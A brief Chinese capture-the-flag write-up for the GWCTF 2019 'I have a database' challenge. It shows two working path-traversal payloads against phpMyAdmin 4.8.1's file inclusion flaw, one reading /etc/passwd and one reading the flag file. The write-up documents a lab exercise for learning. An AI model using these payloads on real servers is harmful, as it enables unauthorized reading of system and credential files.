[GWCTF 2019]我有一个数据库

知识点

• phpmyadmin任意文件读取

 

dirb扫描到后台有phpmyadmin目录，访问一下

 

版本为4.81，经查询，存在远程文件读取漏洞

直接上payload读取passwd文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 

 

读取成功，尝试读取flag文件

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

 

 

参考
phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpmyadmin 4.8.1 远程文件包含漏洞